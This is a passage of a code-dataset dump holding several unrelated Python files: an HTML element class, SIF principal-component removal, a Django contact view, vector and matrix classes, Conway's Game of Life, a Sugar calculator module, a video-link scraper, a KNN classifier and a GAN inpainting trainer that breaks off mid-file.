    \\n')\n\n\nclass Elem:\n\n def __init__(self, tag='div', attr={}, content=None, tag_type='double'):\n if not isinstance(content, (Text, Elem)):\n if type(content) != list and type(content) != None.__class__:\n raise self.ValidationError()\n self.content = [content] if not type(content) == list else content\n self.attr = attr\n self.type = tag_type\n self.space = 0\n self.tag = tag\n\n class ValidationError(Exception):\n def __init__(self):\n Exception.__init__(self, \"Error\")\n\n def __str__(self):\n html = self.create_content()\n if_content = \"\\n%s\" % (\" \" * self.space, self.tag) if self.create_content()\\\n else \"\" % self.tag\n if self.type == 'double':\n return \"<%s%s>%s%s\" % (self.tag, self.create_attr(), html, if_content)\n else:\n return \"<%s%s/>%s\" % (self.tag, self.create_attr(), html)\n\n def create_attr(self):\n attr_html = ''\n for k, v in self.attr.items():\n attr_html += ''' %s=\\\"%s\\\"''' % (k, str(v))\n return attr_html\n\n def create_content(self):\n content_html = ''\n for item in self.content:\n if isinstance(item, Elem):\n self.set_space(item)\n if item:\n content_html += \"\\n %s%s\" % (\" \" * self.space, str(item))\n return content_html\n\n def set_space(self, elem):\n if isinstance(elem, Elem):\n elem.space += 1\n if isinstance(elem.content[0], Elem):\n elem.set_space(elem.content[0])\n\n def add_content(self, content):\n if isinstance(content, (Elem, Text)):\n self.content.append(content)\n else:\n raise self.ValidationError()\n","sub_path":"ex04/elem.py","file_name":"elem.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"648435790","text":"#\n# This code is taken from https://github.com/PrincetonML/SIF\n#\n# All rights remain with the original authors.\n#\n\nfrom sklearn.decomposition import TruncatedSVD\n\ndef compute_pc(X,npc=1):\n \"\"\"\n Compute the principal components. DO NOT MAKE THE DATA ZERO MEAN!\n :param X: X[i,:] is a data point\n :param npc: number of principal components to remove\n :return: component_[i,:] is the i-th pc\n \"\"\"\n svd = TruncatedSVD(n_components=npc, n_iter=7, random_state=0)\n svd.fit(X)\n return svd.components_\n\ndef remove_pc(X, npc=1):\n \"\"\"\n Remove the projection on the principal components\n :param X: X[i,:] is a data point\n :param npc: number of principal components to remove\n :return: XX[i, :] is the data point after removing its projection\n \"\"\"\n pc = compute_pc(X, npc)\n if npc==1:\n XX = X - X.dot(pc.transpose()) * pc\n else:\n XX = X - X.dot(pc.transpose()).dot(pc)\n return XX","sub_path":"edu_sif_ccr/ccr.py","file_name":"ccr.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260369374","text":"import logging\nimport smtplib\n\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect\n\nfrom website.forms import ContactForm\n\nlogger = logging.getLogger('PersonalWebsite.website.views')\n\n\n# Create your views here.\ndef indexPage(request):\n\n context = RequestContext(request)\n\n contact_form = ContactForm()\n email_fail = False\n\n if request.method == 'POST' and 'contact' in request.POST:\n\n logger.info(\"Contact form was posted - %s\", request.POST)\n\n contact_form = ContactForm(data = request.POST)\n\n if contact_form.is_valid():\n\n logger.info(\"Contact form data was valid. Generating email\")\n\n data = {}\n data['name'] = contact_form.cleaned_data['name']\n data['email'] = contact_form.cleaned_data['email']\n data['subject'] = contact_form.cleaned_data['subject']\n data['message'] = contact_form.cleaned_data['message']\n\n try:\n contact_form.sendEmail(data)\n\n response = HttpResponseRedirect('/')\n\n # Add cookie so we know succesful was posted when handling redirect\n # Could pass this email to template (not doing it at the moment)\n response.set_cookie('provided_email', data['email'])\n\n return response\n\n except smtplib.SMTPException:\n logger.error(\"Error occured sending contact email\")\n email_fail = True\n else:\n logger.error(\"Contact form data was invalid\")\n\n logger.info(\"Rendering index.html\")\n\n # This means a successful contact form was posted\n if request.COOKIES.get('provided_email'):\n\n context_dict = {'contact_form': contact_form,\n 'contacted' : True,\n 'email_fail' : email_fail}\n\n response = render_to_response('index.html', context_dict, context)\n response.delete_cookie('provided_email')\n\n return response\n\n else:\n\n context_dict = {'contact_form': contact_form,\n 'contacted' : False,\n 'email_fail' : email_fail}\n\n if email_fail:\n context_dict['email'] = data['email']\n\n return render_to_response('index.html', context_dict, context)\n","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558170178","text":"from functools import reduce\n\n\nclass Vector:\n\n def __init__(self, vector1):\n self.vector1 = vector1\n\n def __str__(self):\n return \"{}\".format(self.vector1)\n\n def __repr__(self):\n return self.vector1\n\n #@property (make changes with this)\n def shape(self):\n return len(self.vector1)\n\n def shape_rule(self):\n raise ValueError(\"Incompatible shapes\")\n\n def shape_check(self, other):\n if self.shape() != other.shape():\n return self.shape_rule()\n\n def __add__(self, other):\n self.shape_check(other)\n new_vector = []\n for num in range(self.shape()):\n new_vector.append(self.vector1[num] + other.vector1[num])\n return new_vector\n\n def __sub__(self, other):\n self.shape_check(other)\n new_vector = []\n for num in range(self.shape()):\n new_vector.append(self.vector1[num] - other.vector1[num])\n return new_vector\n\n def __mul__(self, other):\n new_vector = []\n for num in range(self.shape()):\n new_vector.append(self.vector1[num] * other)\n return new_vector\n\n def dot(self, other):\n new_vector = []\n self.shape_check(other)\n vec_len = range(len(self.vector1))\n for pos in vec_len:\n new_vector.append(self.vector1[pos] * other.vector1[pos])\n return reduce(lambda x, y: x + y, new_vector)\n\n def magnitude(self):\n scalar = 0\n vector_len = len(self.vector1)\n for spot in range(0, vector_len):\n scalar += (self.vector1[spot] **2)\n return (scalar **(1/2))\n\nclass Matrix:\n\n def __init__(self, matrix1):\n self.matrix1 = matrix1\n\n def __str__(self):\n return \"{}\".format(self.matrix1)\n\n def column(self, num):\n col = []\n for line in self.matrix1:\n col.append(line[num])\n return col\n\n def row(self, num):\n return self.matrix1[num]\n\n def matrix_shape(self):\n column = len(self.matrix1)\n row = len(self.matrix1[0])\n return column, row\n\n def shape_check(self, other):\n if isinstance(other, Vector):\n if self.shape()[1] != other.shape():\n return self.shape_rule()\n if isinstance(other, self.__class__):\n if self.shape() != other.shape():\n return self.shape_rule()\n\n #@property (make changes with this)\n def shape(self):\n column = len(self.matrix1)\n row = len(self.matrix1[0])\n return column, row\n\n def shape_rule(other):\n raise ValueError(\"Incompatible shapes\")\n\n def __add__(self, other):\n self.shape_check(other)\n new_matrix = []\n for pos in range(len(self.column(0))):\n new_row = []\n for posi in range(len(self.row(0))):\n new_row.append(self.matrix1[pos][posi] + other.matrix1[pos][posi])\n new_matrix.append(new_row)\n return new_matrix\n\n def __sub__(self, other):\n self.shape_check(other)\n new_matrix = []\n for pos in range(len(self.column(0))):\n new_row = []\n for posi in range(len(self.row(0))):\n new_row.append(self.matrix1[pos][posi] - other.matrix1[pos][posi])\n new_matrix.append(new_row)\n return new_matrix\n\n def __mul__(self, other):\n self.shape_check(other)\n if isinstance(other, int):\n new_matrix = []\n for pos in range(len(self.column(0))):\n new_row = []\n for posi in range(len(self.row(0))):\n new_row.append(self.matrix1[pos][posi] * other)\n new_matrix.append(new_row)\n return new_matrix\n if isinstance(other, Vector):\n new_vec = []\n for row in self.matrix1:\n number = 0\n for pos in range(len(self.row(0))):\n number += (other.vector1[pos] * row[pos])\n new_vec.append(number)\n return new_vec\n\n\"\"\"Make Matrix a sub-class of vector, make vector a sub-class of list. Do more\nwith @property. Use my definitions within one another to simplify the\ndefinitions. Use Super to make things like the shape check better.\"\"\"\n","sub_path":"matrix_objects.py","file_name":"matrix_objects.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"156705417","text":"\"\"\"\nconway.py\nAuthor: Adam Glueck\nCredit: Glen Passow, Stack overflow\nAssignment:\nWrite and submit a program that plays Conway's Game of Life, per \nhttps://github.com/HHS-IntroProgramming/Conway-Life\n\"\"\"\nfrom ggame import Frame, App, Color, RectangleAsset, Sprite, ImageAsset, LineStyle \nblack=Color(0x000000,1.0)\ncelestegreen=Color(0x00FFB7,1.0)\nred=Color(0xBA0000,1.0)\nline=LineStyle(1, black)\nheight=30\nwidth=30\n#imports graphics, gets color, sets dimensions of squares\ndictionary={}\n#creates an aptly named dictionary\nthinline=LineStyle(1, black)\nlivingcell=RectangleAsset(30,30,line,celestegreen)\nzombiecell=RectangleAsset(30,30,line,red)\n#creates squares\nclass cell(Sprite):\n def __init__(self, asset, position):\n super().__init__(asset, position)\n self.visible=False\n self.sca=0\nfor x in range(0,height):\n for y in range(0,width):\n Sprite(zombiecell,(x*height,y*width))\n dictionary[(x,y)]=cell(livingcell,(x*height,y*width))\nclass ConwayGame(App):\n def __init__(self):\n ConwayGame.listenKeyEvent(\"keydown\", \"space\",self.spaceclick)\n SCREEN_WIDTH=960\n SCREEN_HEIGHT=720\n self.moving = False\n super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT)\n ConwayGame.listenMouseEvent(\"click\",self.create)\n #creates the screen\n def create(self, event):\n self.cx=int(event.x/30)\n self.cy=int(event.y/30)\n #identifies mouse location\n dictionary[(self.cx, self.cy)].visible=not dictionary[(self.cx, self.cy)].visible\n #makes dead living by checking if inivis and if so making vis\n \n def spaceclick(self,event):\n self.moving=not self.moving\n def step(self):\n if self.moving==True:\n for a in range(0,height):\n for b in range(0,width):\n if dictionary[(a,b)].visible==True:\n dictionary[(a,b)].sca=dictionary[(a,b)].sca-1\n for c in range(-1,2):\n for d in range(-1,2):\n if (c+a, d+b) in dictionary and dictionary[(c+a,d+b)].visible==True:\n dictionary[(a,b)].sca=dictionary[(a,b)].sca+1\n \n for e in range(0,height):\n for f in range(0,width):\n if dictionary[(e,f)].visible==True and dictionary[(e,f)].sca<2:\n dictionary[(e,f)].visible=False\n elif dictionary[(e,f)].visible==True and dictionary[(e,f)].sca>3:\n dictionary[(e,f)].visible=False\n elif dictionary[(e,f)].visible==False and dictionary[(e,f)].sca==3:\n dictionary[(e,f)].visible=True\n dictionary[(e,f)].sca=0\n #check\nmyapp=ConwayGame()\nmyapp.run()\n","sub_path":"conway.py","file_name":"conway.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"304834856","text":"# -*- coding: utf-8 -*-\n# calculate.py, sugar calculator, by:\n# Reinier Heeres \n# Miguel Alvarez \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n#\n# Change log:\n# 2007-07-03: rwh, first version\n\nfrom gettext import gettext as _\n#from numerals import local as _n, standard as _s\nimport logging\n_logger = logging.getLogger('Calculate')\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nimport base64\n\n#import sugar3.profile\n#from sugar3.graphics.xocolor import XoColor\n\n#from shareable_activity import ShareableActivity\n#from layout import CalcLayout\n#from mathlib import MathLib\n#from astparser import AstParser, ParserError, ParseError, RuntimeError\n#from svgimage import SVGImage\n\nfrom decimal import Decimal\n#from rational import Rational\n\n\ndef findchar(text, chars, ofs=0):\n '''\n Find a character in set starting from offset ofs.\n Everything between brackets '()' is ignored.\n '''\n\n level = 0\n for i in range(ofs, len(text)):\n if text[i] in chars and level == 0:\n return i\n elif text[i] == '(':\n level += 1\n elif text[i] == ')':\n level -= 1\n\n return -1\n\n\ndef _textview_realize_cb(widget):\n '''Change textview properties once window is created.'''\n win = widget.get_window(Gtk.TextWindowType.TEXT)\n win.set_cursor(Gdk.Cursor.new(Gdk.CursorType.HAND1))\n return False\n\n\nclass Equation:\n\n def __init__(self, label=None, eqn=None, res=None, col=None, owner=None,\n eqnstr=None, ml=None):\n\n if eqnstr is not None:\n self.parse(eqnstr)\n elif eqn is not None:\n self.set(label, eqn, res, col, owner)\n\n self.ml = ml\n\n def set(self, label, eqn, res, col, owner):\n \"\"\"Set equation properties.\"\"\"\n\n self.label = label\n self.equation = eqn\n self.result = res\n self.color = col\n self.owner = owner\n\n def __str__(self):\n if isinstance(self.result, SVGImage):\n svg_data = \"\" + base64.b64encode(self.result.get_svg_data())\n return \"%s;%s;%s;%s;%s\\n\" % \\\n (self.label, self.equation, svg_data,\n self.color.to_string(), self.owner)\n else:\n return \"%s;%s;%s;%s;%s\\n\" % \\\n (self.label, self.equation, self.result,\n self.color.to_string(), self.owner)\n\n def parse(self, str):\n \"\"\"Parse equation object string representation.\"\"\"\n\n str = str.rstrip(\"\\r\\n\")\n k = str.split(';')\n if len(k) != 5:\n _logger.error(_('Equation.parse() string invalid (%s)'), str)\n return False\n\n if k[2].startswith(\"\"):\n k[2] = SVGImage(data=base64.b64decode(k[2][5:]))\n\n # Should figure out how to use MathLib directly in a non-hacky way\n else:\n try:\n k[2] = Decimal(k[2])\n except Exception:\n pass\n\n self.set(k[0], k[1], k[2], XoColor(color_string=k[3]), k[4])\n\n def determine_font_size(self, *tags):\n size = 0\n for tag in tags:\n try:\n size = max(size, tag.get_property('size'))\n except:\n pass\n return size\n\n def append_with_superscript_tags(self, buf, text, *tags):\n '''Add a text to a Gtk.TextBuffer with superscript tags.'''\n fontsize = self.determine_font_size(*tags)\n _logger.debug('font-size: %d', fontsize)\n tagsuper = buf.create_tag(rise=fontsize / 2)\n\n ENDSET = list(AstParser.DIADIC_OPS)\n ENDSET.extend((',', '(', ')'))\n ASET = list(AstParser.DIADIC_OPS)\n ofs = 0\n bracket_level = 0\n level = 0\n while ofs <= len(text) and text.find('**', ofs) != -1:\n nextofs = text.find('**', ofs)\n buf.insert_with_tags(buf.get_end_iter(), text[ofs:nextofs], *tags)\n nextofs2 = findchar(text, ENDSET, nextofs + 2)\n for i in range(nextofs, len(text)):\n if text[i] in ['(', '+', '-', ')']:\n if text[i] == '(':\n bracket_level = bracket_level + 1\n elif text[i] == ')':\n nextofs2 = i + 1\n bracket_level = bracket_level - 1\n if bracket_level == 0:\n break\n elif text[i] == '+':\n if level == 0 and bracket_level == 0:\n nextofs2 = findchar(text, ASET, i)\n break\n if bracket_level == 0:\n nextofs2 = findchar(text, ASET, i + 1)\n break\n elif text[i] == '-':\n if bracket_level == 0:\n if i == nextofs + 2:\n nextofs2 = findchar(text, ASET, i + 1)\n break\n else:\n nextofs2 = findchar(text, ASET, i)\n break\n\n _logger.debug('nextofs2: %d, char=%c', nextofs2, text[nextofs2])\n if nextofs2 == -1:\n nextofs2 = len(text)\n buf.insert_with_tags(\n buf.get_end_iter(), text[nextofs + 2:nextofs2],\n tagsuper, *tags)\n ofs = nextofs2\n\n if ofs < len(text):\n buf.insert_with_tags(buf.get_end_iter(), text[ofs:], *tags)\n\n def create_lasteq_textbuf(self):\n '''\n Return a Gtk.TextBuffer properly formatted for last equation\n Gtk.TextView.\n '''\n\n is_error = isinstance(self.result, ParserError)\n buf = Gtk.TextBuffer()\n tagsmallnarrow = buf.create_tag(font=CalcLayout.FONT_SMALL_NARROW)\n tagbignarrow = buf.create_tag(font=CalcLayout.FONT_BIG_NARROW)\n tagbigger = buf.create_tag(font=CalcLayout.FONT_BIGGER)\n tagjustright = buf.create_tag(justification=Gtk.Justification.RIGHT)\n tagred = buf.create_tag(foreground='#FF0000')\n\n # Add label and equation\n if len(self.label) > 0:\n labelstr = '%s:' % self.label\n buf.insert_with_tags(buf.get_end_iter(), labelstr, tagbignarrow)\n eqnoffset = buf.get_end_iter().get_offset()\n eqnstr = '%s\\n' % str(self.equation)\n if is_error:\n buf.insert_with_tags(buf.get_end_iter(), eqnstr, tagbignarrow)\n else:\n self.append_with_superscript_tags(buf, eqnstr, tagbignarrow)\n\n # Add result\n if type(self.result) in (bytes, str):\n resstr = str(self.result)\n resstr = resstr.rstrip('0').rstrip('.') \\\n if '.' in resstr else resstr\n buf.insert_with_tags(buf.get_end_iter(), resstr,\n tagsmallnarrow, tagjustright)\n elif is_error:\n resstr = str(self.result)\n resstr = resstr.rstrip('0').rstrip('.') \\\n if '.' in resstr else resstr\n buf.insert_with_tags(buf.get_end_iter(), resstr, tagsmallnarrow)\n range = self.result.get_range()\n eqnstart = buf.get_iter_at_offset(eqnoffset + range[0])\n eqnend = buf.get_iter_at_offset(eqnoffset + range[1])\n buf.apply_tag(tagred, eqnstart, eqnend)\n elif not isinstance(self.result, SVGImage):\n resstr = self.ml.format_number(self.result)\n resstr = str(resstr).rstrip('0').rstrip('.') \\\n if '.' in resstr else resstr\n self.append_with_superscript_tags(buf, resstr, tagbigger,\n tagjustright)\n\n return buf\n\n def create_history_object(self):\n \"\"\"\n Create a history object for this equation.\n In case of an SVG result this will be the image, otherwise it will\n return a properly formatted Gtk.TextView.\n \"\"\"\n\n if isinstance(self.result, SVGImage):\n return self.result.get_image()\n\n w = Gtk.TextView()\n w.modify_base(\n Gtk.StateType.NORMAL, Gdk.color_parse(self.color.get_fill_color()))\n w.modify_bg(\n Gtk.StateType.NORMAL,\n Gdk.color_parse(self.color.get_stroke_color()))\n w.set_wrap_mode(Gtk.WrapMode.WORD_CHAR)\n w.set_border_window_size(Gtk.TextWindowType.LEFT, 4)\n w.set_border_window_size(Gtk.TextWindowType.RIGHT, 4)\n w.set_border_window_size(Gtk.TextWindowType.TOP, 4)\n w.set_border_window_size(Gtk.TextWindowType.BOTTOM, 4)\n w.connect('realize', _textview_realize_cb)\n buf = w.get_buffer()\n\n tagsmall = buf.create_tag(font=CalcLayout.FONT_SMALL)\n tagsmallnarrow = buf.create_tag(font=CalcLayout.FONT_SMALL_NARROW)\n tagbig = buf.create_tag(font=CalcLayout.FONT_BIG,\n justification=Gtk.Justification.RIGHT)\n # TODO Fix for old Sugar 0.82 builds, red_float not available\n bright = (\n Gdk.color_parse(self.color.get_fill_color()).red_float +\n Gdk.color_parse(self.color.get_fill_color()).green_float +\n Gdk.color_parse(self.color.get_fill_color()).blue_float) / 3.0\n if bright < 0.5:\n col = Gdk.color_parse('white')\n else:\n col = Gdk.color_parse('black')\n tagcolor = buf.create_tag(foreground=col)\n\n # Add label, equation and result\n if len(self.label) > 0:\n labelstr = '%s:' % self.label\n buf.insert_with_tags(buf.get_end_iter(), labelstr, tagsmallnarrow)\n eqnstr = '%s\\n' % str(self.equation)\n self.append_with_superscript_tags(buf, eqnstr, tagsmall)\n\n resstr = self.ml.format_number(self.result)\n resstr = str(resstr).rstrip('0').rstrip('.') \\\n if '.' in resstr else resstr\n if len(resstr) > 30:\n restag = tagsmall\n else:\n restag = tagbig\n self.append_with_superscript_tags(buf, resstr, restag)\n\n buf.apply_tag(tagcolor, buf.get_start_iter(), buf.get_end_iter())\n\n return w\n\ndef main():\n win = Gtk.Window(Gtk.WindowType.TOPLEVEL)\n Calculate(win)\n Gtk.main()\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"TestAutomation/project/src/calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"268666131","text":"import urllib.request\nfrom sys import argv\n\n#side = 'http://localhost/~mathiasholm/ntnu2.htm'\n#side = 'http://video.adm.ntnu.no/serier/52b1a4b91a601'\nside = 'https://video.adm.ntnu.no/serier/4fe2d4d3dcfd3'\nside = argv[1]\ndobj = urllib.request.urlopen(side)\n\ndef lister():\n SideKø = []\n ItererKø = True\n while ItererKø is True:\n testlinje = dobj.readline().decode('latin-1')\n if 'video.adm.ntnu.no/pres/' in testlinje:\n print(testlinje)\n SideKø.append(testlinje)\n if '' in testlinje:\n ItererKø = False\n\n EndeligSide = []\n\n for e in SideKø:\n medio = e.strip(' ')\n medio = medio[75:-3]\n print(SideKø)\n EndeligSide.append(medio)\n print(EndeligSide)\n return(EndeligSide)\n\ndef SkrivListe(FilListe):\n with open('unikodetest.txt', mode='a+', encoding='utf8') as målfil:\n for e in FilListe:\n print(e)\n målfil.write(e+'\\n')\n\nif __name__ == \"__main__\":\n print('Å, faen. åååå, faen')\n SkrivListe(lister())\n","sub_path":"ntnu_openvideo/lister.py","file_name":"lister.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"649429995","text":"#!/opt/local/bin/python\n# _*_ coding: utf-8 _*_\n\n'K Nearest Neighbour'\n\n__author__ = 'Ethan Mengoreo'\n\nimport numpy as np\nfrom sklearn import preprocessing, neighbors\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\n\ndf = pd.read_csv('breast-cancer-wisconsin.data')\n# Replace not a number\ndf.replace('?', -99999, inplace=True) # Outlier\ndf.drop(['id'], 1, inplace=True)\n\nX = np.array(df.drop(['class'], 1))\ny = np.array(df['class'])\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\nclf = neighbors.KNeighborsClassifier()\nclf.fit(X_train, y_train)\n\naccuracy = clf.score(X_test, y_test)\nprint(accuracy)\n\nexample_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]])\n# Basicly a transpose\nexample_measures = example_measures.reshape(len(example_measures), -1)\npredicted = clf.predict(example_measures)\nprint(predicted)\n","sub_path":"knn/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"571831271","text":"import torch\nfrom torch import nn\nfrom tqdm.auto import tqdm\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torchvision.utils import make_grid\nfrom src.dataLayer import makeMasks\nfrom pathlib import Path\nimport torchvision.transforms as transforms\nfrom src.shared.modelUtility import modelHelper\nfrom src.models.UnetPartialConvModel import PartialConv2d\nfrom src.models.loss import CalculateLoss\nimport os\n\nclass trainInpainting():\n def __init__(self, dataloader, testImageDataloader, generator, discriminator, config):\n self.dataloader = dataloader\n self.testdataloader = testImageDataloader\n self.generator = generator\n self.discriminator = discriminator\n self.batchSize = config.batch_size\n self.epochs = config.epochs\n self.numberGPU = config.numberGPU # if using pure pytorch\n self.lr = config.lr\n self.beta1 = config.beta1\n self.beta2 = config.beta2\n self.device = config.device\n self.save_error_step = config.save_error_step\n self.config = config\n if config.run_polyaxon:\n self.localdir = config.data_path\n self.output_path =config.output_path\n else:\n self.localdir = Path().absolute().parent\n self.output_path= Path().absolute().parent\n self.modelOutputPath = Path.joinpath(self.output_path, 'models')\n self.ImageOutputPath = Path.joinpath(self.output_path,'images')\n self.trainMode = config.trainMode\n self.modelName = config.model_name\n self.run_TCI = config.run_TCI\n self.save_model_step = config.save_model_step\n\n def image_tensor_batch_to_list_of_pil_images(self,image_batch, resize_resolution=None):\n \"\"\"Creates a list of PIL images from a PyTorch tensor batch of 3-channel images.\n Creates a list of PIL images from a PyTorch tensor batch of 3-channel images.\n Args:\n image_batch: PyTorch tensor image batch.\n resize_resolution: Resolution which PIL images will be resized to.\n Returns:\n image_pil_list: List of PIL images.\n \"\"\"\n # Ensure that there is a batch dimension\n if len(image_batch.shape) < 4: # If there is only a single image in the batch\n image_batch = image_batch.unsqueeze(0) # Add extra dimension (batch size dimension)\n\n # Loop over the batch and append pil images to list\n image_pil_list = []\n num_images = image_batch.shape[0]\n for i in range(num_images):\n image_tensor = image_batch[i, :, :, :]\n image_pil = transforms.ToPILImage()(image_tensor.cpu()).convert('RGB')\n #if resize_resolution is not None:\n # image_pil = image_pil.resize(resize_resolution, Image.CUBIC)\n image_pil_list.append(image_pil)\n\n return image_pil_list\n\n def tensor_to_numpy(self,image_batch):\n images = []\n for i in image_batch:\n image = i.detach().cpu().numpy()\n image_numpy = image.astype(np.uint8)\n images.append(image_numpy)\n return images\n\n def show_tensor_images(self, image_tensorReal, image_tensorFake, image_tensorMasked,\n size=(3, 256, 256)):\n\n '''\n Function for visualizing images: Given a tensor of images, number of images, and\n size per image, plots and prints the images in an uniform grid.\n '''\n image_tensor1 = (image_tensorReal + 1) / 2\n image_unflat1 = image_tensor1.detach().cpu()\n image_tensor2 = (image_tensorFake + 1) / 2\n image_unflat2 = image_tensor2.detach().cpu()\n image_tensor3 = (image_tensorMasked + 1) / 2\n image_unflat3 = image_tensor3.detach().cpu()\n image_unflat1 = torch.cat((image_unflat1, image_unflat2, image_unflat3), dim=0)\n image_grid = make_grid(image_unflat1[:self.batchSize * 3], nrow=self.batchSize)\n plt.imshow(image_grid.permute(1, 2, 0).squeeze())\n plt.show()\n\n def trainGAN(self):\n gen = self.generator().to(self.device)\n gen_opt = torch.optim.Adam(gen.parameters(), lr=self.lr, betas=(self.beta1, self.beta2))\n disc = self.discriminator().to(self.device)\n disc_opt = torch.optim.Adam(disc.parameters(), lr=self.lr, betas=(self.beta1, self.beta2))\n filename = Path.joinpath(self.modelOutputPath, self.modelName + '_Errors_' + str(self.batchSize) + '.txt')\n criterionBCE = nn.BCELoss().cuda()\n criterionMSE = nn.L1Loss().cuda()\n\n # Loss function\n # Moves vgg16 model to gpu, used for feature map in loss function\n loss_func = CalculateLoss(self.config).cuda()\n print(\"Setup loss function...\")\n cur_step = 0\n\n discriminator_loss = []\n generator_loss = []\n generator_loss_BCE = []\n\n loadAndAgumentMasks = makeMasks.MaskClass(self.config,rand_seed=None)\n\n # måske nn.Conv2d med vægte ikke virker når vi bruger partconv2d, i så fald måske tilføje\n # or isinstance(m,partConv2d) og læg partconv2d et sted hvor den er accessible.\n def weights_init(m):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d) or isinstance(m,PartialConv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)\n elif isinstance(m,nn.LayerNorm):\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n torch.nn.init.constant_(m.bias, 0)\n\n def weights_initOld(m):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d) or isinstance(m,PartialConv2d):\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n elif isinstance(m, nn.BatchNorm2d):\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n torch.nn.init.constant_(m.bias, 0)\n elif isinstance(m,nn.LayerNorm):\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n torch.nn.init.constant_(m.bias, 0)\n\n\n gen = gen.apply(weights_init)\n disc = disc.apply(weights_init)\n for epoch in range(self.epochs):\n # Dataloader returns the batches\n\n for real in tqdm(self.dataloader,position=0,leave=True,disable=self.config.run_polyaxon):\n masks = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n masks = torch.from_numpy(masks)\n masks = masks.type(torch.cuda.FloatTensor)\n masks = 1 - masks\n masks.to(self.device)\n\n Sar = real[1].to(self.device)\n real = real[0].to(self.device)\n real = real.type(torch.FloatTensor).to(self.device)\n\n ## Update discriminator ##\n disc.zero_grad()\n fake_noise = torch.mul(real, masks)\n fake = gen(fake_noise, masks)\n disc_fake_pred = disc(fake.detach())\n disc_fake_loss = criterionBCE(disc_fake_pred, torch.zeros_like(disc_fake_pred))\n disc_real_pred = disc(real)\n disc_real_loss = criterionBCE(disc_real_pred, torch.ones_like(disc_real_pred))\n disc_loss = (disc_fake_loss + disc_real_loss)/2\n\n gen_score_fakes = disc_fake_pred.mean().item()\n disc_score_reals = disc_real_pred.mean().item()\n\n # Keep track of the average discriminator loss\n discriminator_loss.append(disc_loss.item())\n # Update gradients\n disc_loss.backward()\n # Update optimizer\n disc_opt.step()\n\n ## Update generator ##\n gen.zero_grad()\n fake_2 = gen(fake_noise, masks)\n disc_fake_pred2 = disc(fake_2)\n #Calculate loss\n gen_lossMSE = criterionMSE(real, fake_2)\n gen_loss_Adversarial = criterionBCE(disc_fake_pred2, torch.ones_like(disc_real_pred))\n\n #Add heavy penalty to pixels underneath the mask, ie, try not to make it mode_collaps?\n masks = 1-masks\n real_masked_area = torch.mul(real,masks)\n fake_masked_area = torch.mul(fake_2,masks)\n #gen_loss_Inpainted_area = criterionMSE(real_masked_area,fake_masked_area)\n gen_loss = gen_lossMSE + gen_loss_Adversarial #+ (gen_loss_Inpainted_area*5)\n\n gen_score_fakes1 = disc_fake_pred2.mean().item()\n # få lavet en loss function, der penalizer pixels ændret udenfor maske\n # + regner MSE/L1 på alle pixels\n gen_loss.backward()\n gen_opt.step()\n\n # Keep track of the average generator loss\n generator_loss.append(gen_loss.item())\n generator_loss_BCE.append(gen_loss_Adversarial.item())\n ## Visualization code ##\n #modelHelper.save_tensor_single(real[0],Path.joinpath(self.ImageOutputPath, 'epoch_' + str(epoch) + '.tiff'))\n if cur_step % self.save_model_step == 0 and cur_step > 0 and self.trainMode == False:\n\n #if not training, it means we are messing around testing stuff, so no need to save model\n #and losses\n print(\n f\"Step {cur_step}: Generator loss: {gen_loss.item()}, discriminator loss: {disc_loss.item()}\")\n\n # Save loss from generator and discriminator to a file, and reset them, to avoid the list perpetually growing\n # Name of file = model name + batch_size +\n discriminator_loss = [sum(discriminator_loss) / len(discriminator_loss)]\n generator_loss = [sum(generator_loss) / len(generator_loss)]\n generator_loss_BCE = [sum(generator_loss_BCE) / len(generator_loss_BCE)]\n\n self.show_tensor_images(fake_2, real, fake_noise)\n\n #If in train 